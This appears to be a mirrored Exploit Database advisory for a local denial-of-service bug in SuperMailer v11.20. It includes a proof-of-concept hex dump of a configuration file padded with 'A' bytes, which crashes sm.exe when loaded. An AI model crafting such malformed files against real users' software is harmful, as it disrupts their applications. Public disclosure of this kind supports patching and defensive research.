SuperMailer v11.20 – Buffer overflow DoS

• Exploit Database
• 39 阅读

• 作者： Rafael Pedrero
  日期： 2023-03-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51102/

• # Exploit Title:SuperMailer v11.20 - Buffer overflow DoS
  # Exploit Author: Rafael Pedrero
  # Discovery Date: 2021-02-07
  # Vendor Homepage:
  https://int.supermailer.de/download_newsletter_software.htm
  # Software Link : https://int.supermailer.de/smintsw.zip /
  https://int.supermailer.de/smintsw_x64.zip
  # Tested Version: v11.20 32bit/64bit [11.20.0.2204]
  # Tested on:Windows 7, 10
  
  CVSS v3: 3.3
  CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
  CWE: CWE-20
  
  Vulnerability description: A vulnerability in Newsletter Software
  SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
  cause a process crash resulting in a Denial of service (DoS) condition for
  the application on an affected system. The vulnerability exists due to
  insufficient validation of certain elements with a configuration file
  malformed. An attacker could exploit this vulnerability by sending a user a
  malicious SMB (configuration file) file through a link or email attachment
  and persuading the user to open the file with the affected software on the
  local system. A successful exploit could allow the attacker to cause the
  application to crash when trying to load the malicious file.
  
  Proof of concept:
  
  1.- Go to File -> Save program options...
  2.- Save the file (default extension *.smb)
  3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
  file
  
  Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
  
  0000000010 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41........©å~AAAAA
  0000001041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000002041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000003041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000004041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000005041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000006041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000007041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000008041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  0000009041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  000000A041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  000000B041 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00AA—™å@..........
  000000C000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00................
  000000D000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00................
  000000E000 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00......k...S.o.f.
  000000F074 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00t.w.a.r.e.\.M.i.
  0000010072 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00r.k.o. .B.o.e.e.
  0000011072 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00r. .S.o.f.t.w.a.
  0000012072 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00r.e.\.S.u.p.e.r.
  000001304D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00M.a.i.l.e.r.\.T.
  0000014065 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00e.s.t. .E.M.a.i.
  000001506C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00l. .A.d.d.r.e.s.
  0000016073 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00s.e.s...........
  
  And save the file.
  
  4.- Go to File -> Restore program options...
  5.- The application "sm.exe" crash.